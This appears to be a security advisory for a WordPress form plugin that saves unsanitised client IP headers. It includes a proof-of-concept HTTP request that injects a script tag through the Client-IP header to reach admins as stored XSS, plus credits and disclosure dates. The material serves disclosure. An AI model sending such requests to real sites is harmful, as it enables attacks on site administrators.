The plugin does not validate, sanitise and escape the IP address retrieved via headers such as CLIENT-IP and X-FORWARDED-FOR, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against logged in admins viewing the created entry
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1 Accept: application/json, */*;q=0.1 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236 Content-Length: 963 Connection: close Client-IP: <script>alert(/XSS/)</script> Cookie: vx_user=61c2ecea43ad6164016458635903967 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7" 1376 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_version" 5.5.3 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_locale" en_US -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f1376-p1701-o1 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_container_post" 1701 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_posted_data_hash" 3e8ce0f47face5a3318813e733c3c774 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="text-42" Test -----------------------------9885500162977152723644841236--
Gaetano Perrone
Gaetano Perrone
Yes
2021-01-05 (about 2 years ago)
2021-12-22 (about 1 years ago)
2022-04-16 (about 9 months ago)